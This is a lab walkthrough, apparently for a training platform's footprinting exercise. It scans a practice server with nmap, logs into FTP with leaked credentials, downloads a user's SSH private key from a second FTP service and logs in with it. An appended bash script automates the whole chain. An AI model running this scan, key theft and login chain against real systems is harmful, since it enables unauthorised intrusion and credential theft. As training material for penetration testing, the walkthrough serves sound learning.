Footprinting Lab - Easy
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.
The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials "ceil:qwer1234", and they pointed out that some of the company's employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
First, I run a quick TCP SYN scan of the full port range to identify all open ports -->
nmap -p- --open -sS 10.129.42.195 -Pn -n
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
Now, let's enumerate the versions of those services and run the default scripts against them -->
nmap -p 21,22,53,2121 -sCV 10.129.42.195 -Pn -n
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.42.195]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.42.195]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
We can also run a UDP scan against the most common ports -->
nmap --top-ports 5000 --open -sU 10.129.42.195 -Pn -n --min-rate 1000
PORT STATE SERVICE
53/udp open domain
623/udp open asf-rmcp
Note: I had already checked for anonymous FTP login.
We have credentials, so now let's try to log in via FTP -->

On port 21 there is nothing of interest, but there is a second ProFTPD instance on port 2121 ("Ceil's FTP"), so let's try logging in there -->

We can see a .ssh folder; perhaps we can obtain the id_rsa private key from it -->

Nice. After downloading it, set the permissions SSH requires with chmod (the client refuses a world-readable key) and connect as user ceil with the key (-i, lowercase; -I selects a PKCS#11 library instead) -->
chmod 600 id_rsa
ssh ceil@10.129.42.195 -i id_rsa
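The following script is an added example and is not part of the original writeup: it strings the steps above together (full TCP scan, version scan on the discovered ports, key retrieval from the FTP service on 2121, SSH with the key) into one bash script. The only part that runs offline is the parser for nmap's grepable output, exercised on a constructed sample that reproduces the ports found above; the target IP, the credentials ceil:qwer1234 and the path .ssh/id_rsa are taken from the writeup, and the network steps only run when a target is passed on the command line.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup. Automates the two-stage
# nmap workflow and the FTP -> SSH key pivot described above.
# Assumptions: credentials ceil:qwer1234 and key path .ssh/id_rsa come from the
# writeup; the SYN scan (-sS) needs root, as in the original command.
set -eu

# Constructed sample of `nmap -p- --open -sS -oG -` output, matching the TCP
# ports found in the writeup, so the parser can be tested without a network.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated
Host: 10.129.42.195 ()	Status: Up
Host: 10.129.42.195 ()	Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 53/open/tcp//domain///, 2121/open/tcp//ccproxy-ftp///	Ignored State: closed (65531)
# Nmap done'

# Constructed UDP counterpart, matching the UDP results above.
SAMPLE_UDP_GNMAP='Host: 10.129.42.195 ()	Ports: 53/open/udp//domain///, 623/open/udp//asf-rmcp///'

# open_ports [proto]: read grepable nmap output on stdin and print a
# comma-separated, numerically sorted list of open ports for the given
# protocol (default tcp), ready for `nmap -p`.
open_ports() {
  local proto="${1:-tcp}"
  grep -oE "[0-9]+/open/${proto}" \
    | cut -d/ -f1 \
    | sort -n | uniq \
    | paste -sd, -
}

# fetch_key host [port] [user] [pass]: download the private key from the
# second ProFTPD instance over FTP and lock its permissions down for SSH.
fetch_key() {
  local host="$1" port="${2:-2121}" user="${3:-ceil}" pass="${4:-qwer1234}"
  curl -s -f --user "${user}:${pass}" "ftp://${host}:${port}/.ssh/id_rsa" -o id_rsa
  chmod 600 id_rsa
}

if [ -n "${1:-}" ]; then
  # Live run: ./footprint.sh 10.129.42.195
  target="$1"
  ports=$(nmap -p- --open -sS -Pn -n -oG - "$target" | open_ports)
  echo "[*] open TCP ports: $ports"
  nmap -p "$ports" -sCV -Pn -n "$target"
  fetch_key "$target"
  ssh -i id_rsa "ceil@${target}"
else
  # Offline demo on the constructed samples.
  printf '%s\n' "$SAMPLE_GNMAP" | open_ports
  printf '%s\n' "$SAMPLE_UDP_GNMAP" | open_ports udp
fi
```

Feeding the first scan's grepable output (-oG -) into open_ports removes the manual copy of the port list into the second scan, which is where typos creep in on larger targets; the protocol argument keeps the UDP results separate so 53/udp is not mixed into the TCP -sCV scan.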
